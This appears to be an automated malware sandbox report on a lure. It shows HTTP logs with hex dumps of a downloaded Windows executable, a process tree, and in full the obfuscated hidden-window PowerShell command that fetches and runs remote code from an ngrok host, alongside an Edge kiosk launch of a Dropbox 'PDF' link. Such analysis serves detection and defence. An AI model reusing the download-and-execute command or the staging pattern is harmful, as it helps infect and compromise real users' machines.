                                                                                                                                                                                                                                                                                  X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:47 GMT
                                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                  Content-Length: 1843712
                                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 6f72b7f594144253a7ae166c8501f844
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:48 UTC15646INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 74 a3 a5 f4 30 c2 cb a7 30 c2 cb a7 30 c2 cb a7 17 04 a5 a7 31 c2 cb a7 17 04 a6 a7 33 c2 cb a7 17 04 b0 a7 2a c2 cb a7 8d 8d 5d a7 33 c2 cb a7 2e 90 5e a7 3d c2 cb a7 2e 90 48 a7 25 c2 cb a7 2e 90 4f a7 3f c2 cb a7 2e 90 58 a7 27 c2 cb a7 30 c2 ca a7 c5 c1 cb a7 2e 90 41 a7 00 c2 cb a7 2e 90 5f a7 31 c2 cb a7 2e 90 5a a7 31 c2 cb a7 52 69 63 68 30 c2 cb a7 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$t00013*]3.^=.H%.O?.X'0.A._1.Z1Rich0
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:48 UTC16384INData Raw: c6 74 0e 8b 17 50 8b 42 38 8b cf ff d0 89 44 24 40 8b 43 10 33 f6 89 74 24 3c 3b c6 74 0e 8b 17 50 8b 42 30 8b cf ff d0 89 44 24 3c 6a 58 8d 4c 24 4c 56 51 89 74 24 50 e8 35 f8 06 00 8b 57 08 8b 35 54 c1 47 00 83 c4 0c 6a 06 52 ff d6 50 e8 28 e2 06 00 85 c0 74 1f 8b 47 08 6a 06 50 ff d6 50 e8 16 e2 06 00 8b 50 04 8d 4c 24 44 51 6a 5c 52 ff 15 64 c1 47 00 83 7c 24 4c 00 0f 84 51 01 00 00 57 8d 44 24 1c 8d 74 24 14 e8 a2 0c 01 00 8b 4c 24 4c 85 c9 7d 10 81 c1 10 0e 00 00 89 4c 24 1c db 44 24 1c eb 10 b8 10 0e 00 00 99 f7 f9 89 54 24 1c db 44 24 1c d9 5c 24 1c d9 ee d9 44 24 1c dd e1 df e0 dd d9 f6 c4 44 7a 12 8b 5c 24 14 dd d8 8b 4c 24 10 33 f6 89 74 24 14 eb 4c dc 15 f0 85 48 00 df e0 f6 c4 44 7a 12 8b 5c 24 10 dd d8 8b 4c 24 14 33 f6 89 5c 24 14 eb 2d dc
                                                                                                                                                                                                                                                                                  Data Ascii: tPB8D$@C3t$<;tPB0D$<jXL$LVQt$P5W5TGjRP(tGjPPPL$DQj\RdG|$LQWD$t$L$L}L$D$T$D$\$D$Dz\$L$3t$LHDz\$L$3\$-
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:48 UTC738INData Raw: 74 09 56 e8 26 9f 06 00 83 c4 04 8b c6 5e c2 04 00 cc f6 44 24 04 01 56 8b f1 c7 06 c4 f1 47 00 74 09 56 e8 06 9f 06 00 83 c4 04 8b c6 5e c2 04 00 cc 56 8b f1 e8 08 f6 ff ff f6 44 24 08 01 74 09 56 e8 e7 9e 06 00 83 c4 04 8b c6 5e c2 04 00 cc cc 51 c7 01 cc f1 47 00 e8 e4 f5 ff ff 59 c3 cc cc 83 79 40 00 75 19 8b 54 24 08 8b 01 8b 40 4c 52 8b 54 24 08 52 ff d0 b8 01 00 00 00 c2 08 00 8b 44 24 08 8b 11 8b 52 50 50 8b 44 24 08 50 ff d2 b8 01 00 00 00 c2 08 00 cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 83 ec 44 8b 45 08 d9 ee 33 d2 d9 5c 24 14 53 8b 5d 0c 25 00 00 00 c0 56 8b f1 89 56 64 89 44 24 2c 8b 46 1c 57 8b 38 8b 46 08 81 e3 00 00 00 c0 89 74 24 10 89 54 24 1c 89 54 24 24 89 54 24 14 89 54 24 28 c7 44 24 18 01 00 00 00 89 5c 24 2c 89 54 24 3c 89 54 24
                                                                                                                                                                                                                                                                                  Data Ascii: tV&^D$VGtV^VD$tV^QGYy@uT$@LRT$RD$RPPD$PUDE3\$S]%VVdD$,FW8Ft$T$T$$T$T$(D$\$,T$<T$
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:48 UTC16384INData Raw: 8b 44 24 40 33 c9 8b 74 24 44 3b 71 14 75 0a ff 15 fc c2 47 00 8b 44 24 40 8b 3e 8b 5c 24 2c 8b 74 24 10 33 d2 e9 fc fd ff ff 8b 08 eb d8 8b ff 8b 56 24 8b 4a 18 03 4a 10 8b 46 38 01 4e 64 8b 4e 64 3b c8 8b f9 7f 02 8b f8 8b 45 0c 25 ff ff ff 3f 81 fb 00 00 00 80 74 4a 81 fb 00 00 00 40 75 02 8b f8 89 7c 24 2c 8b c7 25 ff ff ff 00 2b c1 03 44 24 34 83 7c 24 38 00 89 44 24 34 75 35 d9 ee d8 5c 24 20 df e0 f6 c4 05 7b 28 8b 4c 24 14 8b 44 24 28 3b c8 0f 8f 0c 02 00 00 8b c8 e9 05 02 00 00 3b c7 7d bc 0d 00 00 00 01 8b f8 89 44 24 2c eb b3 d9 44 24 20 c7 46 64 00 00 00 00 8b 56 1c d9 5c 24 38 8b 4e 08 8b 3a 89 4c 24 40 8b 5e 1c 8b 46 08 89 7c 24 44 85 c9 74 04 3b c8 74 06 ff 15 fc c2 47 00 3b fb 0f 84 a5 01 00 00 8b 44 24 40 85 c0 75 70 ff 15 fc c2 47 00 33
                                                                                                                                                                                                                                                                                  Data Ascii: D$@3t$D;quGD$@>\$,t$3V$JJF8NdNd;E%?tJ@u|$,%+D$4|$8D$4u5\$ {(L$D$(;;}D$,D$ FdV\$8N:L$@^F|$Dt;tG;D$@upG3
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:48 UTC16053INData Raw: 83 7e 20 00 75 55 8b 16 8b 02 6a 01 8b ce ff d0 8d 4c 24 18 ff 15 24 ce 47 00 8d 5c 24 5c e8 6d 53 00 00 8b 4c 24 5c 51 e8 1f 5c 06 00 83 c4 04 8d 4c 24 24 ff 15 24 ce 47 00 8d 4c 24 14 ff 15 24 ce 47 00 33 c0 8b 4c 24 78 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 8b 55 0c 8b 45 08 8b 4c 24 28 52 50 68 38 e7 47 00 56 e8 ee de ff ff 8d 4c 24 18 ff 15 24 ce 47 00 8d 5c 24 5c e8 0b 53 00 00 8b 4c 24 5c 51 e8 bd 5b 06 00 83 c4 04 8d 4c 24 24 ff 15 24 ce 47 00 8d 4c 24 14 ff 15 24 ce 47 00 8b c6 8b 4c 24 78 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 cc cc cc 55 8b ec 83 e4 f8 6a ff 68 ca ad 47 00 64 a1 00 00 00 00 50 83 ec 30 53 56 57 a1 28 60 49 00 33 c4 50 8d 44 24 40 64 a3 00 00 00 00 8b f1 89 74 24 18 33 c0 89 44 24 10 39 46 3c 75 15 8b 4c
                                                                                                                                                                                                                                                                                  Data Ascii: ~ uUjL$$G\$\mSL$\Q\L$$$GL$$G3L$xdY_^[]UEL$(RPh8GVL$$G\$\SL$\Q[L$$$GL$$GL$xdY_^[]UjhGdP0SVW(`I3PD$@dt$3D$9F<uL
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:48 UTC16384INData Raw: 50 e8 57 21 06 00 8b f0 85 f6 74 3f 8b 46 20 50 ff d7 50 e8 45 21 06 00 85 c0 74 1c 8b c6 e8 f8 44 00 00 8b 48 20 6a 00 6a 00 68 8e 10 00 00 51 ff 15 04 c6 47 00 eb 13 8b 56 20 68 05 01 00 00 6a 00 6a 00 52 ff 15 e0 c5 47 00 e8 fb 01 00 00 8d 4c 24 14 c7 84 24 78 0a 00 00 ff ff ff ff e8 37 27 02 00 8b 45 0c c7 00 00 00 00 00 8b 8c 24 70 0a 00 00 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 08 00 8b 4d 0c c7 01 00 00 00 00 8b 8c 24 70 0a 00 00 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 08 00 8b 55 0c c7 02 00 00 00 00 8b 8c 24 70 0a 00 00 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 08 00 cc cc cc cc 6a ff 68 19 7c 47 00 64 a1 00 00 00 00 50 83 ec 28 a1 28 60 49 00 33 c4 89 44 24 20 53 57 a1 28 60 49 00 33 c4 50 8d 44 24 34 64 a3 00 00 00 00 8b 44 24 44
                                                                                                                                                                                                                                                                                  Data Ascii: PW!t?F PPE!tDH jjhQGV hjjRGL$$x7'E$pdY_^[]M$pdY_^[]U$pdY_^[]jh|GdP((`I3D$ SW(`I3PD$4dD$D
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:48 UTC16384INData Raw: 49 83 c0 14 85 c9 77 d8 5e c3 cc 55 56 8b f1 57 8b f8 8b c6 2b c3 c1 f8 03 03 c0 03 c0 03 c0 8b ef 2b e8 3b de 74 1c 2b fe 8b ff 83 ee 08 56 8d 0c 37 ff 15 94 c9 47 00 8b 4e 04 89 4c 37 04 3b f3 75 e8 5f 5e 8b c5 5d c3 cc cc 57 8b f8 8b d1 2b d6 b8 67 66 66 66 f7 ea c1 fa 03 8b c2 c1 e8 1f 03 c2 8d 04 80 03 c0 03 c0 8b d0 8b c7 2b c2 3b f1 74 30 8b d7 2b d1 8d 49 00 8b 79 ec 83 e9 14 89 3c 0a 8b 79 04 89 7c 0a 04 8b 79 08 89 7c 0a 08 8b 79 0c 89 7c 0a 0c 8b 79 10 89 7c 0a 10 3b ce 75 d7 5f c3 cc cc cc cc cc 55 8b ec 6a ff 68 95 66 47 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 28 60 49 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 65 f0 8b 75 0c 8b f9 33 db 89 75 ec 89 5d fc 3b 7d 08 74 41 c6 45 fc 01 3b f3 74 09 57 8b ce ff 15 04 ce 47 00 83 c6 04 88 5d fc
                                                                                                                                                                                                                                                                                  Data Ascii: Iw^UVW++;t+V7GNL7;u_^]W+gfff+;t0+Iy<y|y|y|y|;u_UjhfGdPSVW(`I3PEdeu3u];}tAE;tWG]
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:48 UTC331INData Raw: cf b8 ab aa aa 2a f7 e9 d1 fa 8b c2 c1 e8 1f 03 c2 3b f0 73 21 8d 0c 76 8b 74 8f 04 85 f6 74 16 56 e8 e5 e2 00 00 8b 16 8b 42 1c 8b 7e 20 8b ce ff d0 8b c7 eb 02 33 c0 24 0f 3c 02 0f 85 87 02 00 00 8b 8b 94 00 00 00 33 ff 57 57 68 04 10 00 00 51 ff 15 04 c6 47 00 85 c0 75 1a 8b 55 0c 89 3a 8b 4c 24 40 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 08 00 53 e8 ef fb 00 00 05 de 7f ff ff 83 c4 04 83 f8 04 0f 87 33 02 00 00 ff 24 85 94 8d 41 00 8d 44 24 24 50 e8 cd 8a ff ff 8d 43 74 89 7c 24 48 e8 21 09 00 00 89 44 24 10 3b c7 0f 84 9b 00 00 00 8b bb c4 02 00 00 8b 83 c0 02 00 00 e8 44 02 01 00 8d 4c 24 20 8b f0 ff 15 28 ce 47 00 c6 44 24 48 01 eb 05 90 8b 5c 24 14 8b 7c 24 10 8b 8b 94 00 00 00 6a 02 4f 57 68 0c 10 00 00 51 ff 15 04 c6 47 00 8d 54 24 20 40 52
                                                                                                                                                                                                                                                                                  Data Ascii: *;s!vttVB~ 3$<3WWhQGuU:L$@dY_^[]S3$AD$$PCt|$H!D$;DL$ (GD$H\$|$jOWhQGT$ @R
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:48 UTC16384INData Raw: ff 15 24 ce 47 00 8d 44 24 24 e8 b1 01 00 00 e9 61 01 00 00 83 c3 74 8b c3 e8 52 b1 fe ff 8b f8 33 f6 85 ff 0f 86 4b 01 00 00 8d 9b 00 00 00 00 6a 03 6a 03 56 8b cb e8 74 a1 05 00 46 3b f7 72 ef e9 2f 01 00 00 83 c3 74 8b c3 e8 20 b1 fe ff 8b f8 33 f6 85 ff 0f 86 19 01 00 00 8d 64 24 00 6a 03 6a 00 56 8b cb e8 44 a1 05 00 46 3b f7 72 ef e9 ff 00 00 00 8d 73 74 8b c6 e8 f0 b0 fe ff 89 44 24 18 85 c0 0f 86 e9 00 00 00 8d 64 24 00 8b 83 94 00 00 00 6a 03 57 68 2c 10 00 00 50 ff 15 04 c6 47 00 6a 03 8b ce 85 c0 74 04 6a 00 eb 02 6a 03 57 e8 f7 a0 05 00 47 3b 7c 24 18 72 d0 e9 b0 00 00 00 8d 73 74 8b c6 e8 b1 07 00 00 89 44 24 1c 3b c7 0f 84 9a 00 00 00 8d 7c 24 1c 8b c6 e8 7a 07 00 00 6a 03 8b f8 57 8d 4c 24 20 51 8b ce e8 bf a0 05 00 6a 00 57 8d 54 24 1c 52
                                                                                                                                                                                                                                                                                  Data Ascii: $GD$$atR3KjjVtF;r/t 3d$jjVDF;rstD$d$jWh,PGjtjjWG;|$rstD$;|$zjWL$ QjWT$R
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:48 UTC16384INData Raw: 00 68 d0 d9 47 00 68 f4 0e 48 00 c6 84 24 a0 00 00 00 02 e8 7e 74 05 00 50 8d 4c 24 1c ff 15 18 ce 47 00 8b 4c 24 30 3b cd 74 21 8b 11 8b 52 14 55 8d 44 24 5c 50 8b 44 24 20 68 00 20 00 00 50 8b 44 24 24 68 04 0f 48 00 50 ff d2 8d 4c 24 18 ff 15 24 ce 47 00 8d 4c 24 14 ff 15 24 ce 47 00 eb 0b 3b cd 74 07 8b 01 8b 50 10 ff d2 8d 44 24 2c 50 c7 84 24 94 00 00 00 ff ff ff ff e8 fe 43 03 00 b8 01 00 00 00 8b 8c 24 88 00 00 00 64 89 0d 00 00 00 00 59 5f 5e 5d 81 c4 84 00 00 00 c3 14 cb 41 00 2d cb 41 00 46 cb 41 00 5c cb 41 00 72 cb 41 00 88 cb 41 00 9e cb 41 00 cc cc cc cc 83 ec 18 53 55 56 33 f6 57 89 74 24 10 39 74 24 2c 0f 84 e1 00 00 00 bf 01 00 00 00 8b df e8 4d 0e 00 00 8b e8 8b c7 8b ce d3 e0 85 c5 74 26 8d 7e 41 57 e8 c8 0e 00 00 83 c4 04 85 c0 74 02
                                                                                                                                                                                                                                                                                  Data Ascii: hGhH$~tPL$GL$0;t!RUD$\PD$ h PD$$hHPL$$GL$$G;tPD$,P$C$dY_^]A-AFA\ArAAASUV3Wt$9t$,Mt&~AWt


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  18192.168.2.44980018.192.31.1654438592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:52 UTC228OUTGET /metadata/3280fc306b2b1b17d755c31452bd62f7 HTTP/1.1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                  Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:54 UTC212INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                  Content-Length: 96
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:53 GMT
                                                                                                                                                                                                                                                                                  Server: Werkzeug/3.0.3 Python/3.12.8
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:54 UTC96INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 4e 6f 74 20 66 6f 75 6e 64 3c 2f 70 3e 0a
                                                                                                                                                                                                                                                                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>Not found</p>


                                                                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                                  Start time:12:41:13
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff749a80000
                                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                                                  Start time:12:41:13
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                                                  Start time:12:41:13
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                                                  Start time:12:41:27
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                                                  Start time:12:41:27
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                                                  Start time:12:41:28
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1976,i,479339844209240994,6957522588551196104,262144 /prefetch:3
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                                                  Start time:12:41:28
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                                                  Start time:12:41:28
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2796 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:3
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                                                  Start time:12:41:32
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6340 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                                                                  Start time:12:41:32
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6528 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                                                  Start time:12:41:33
                                                                                                                                                                                                                                                                                  Start date:10/12/2024
                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
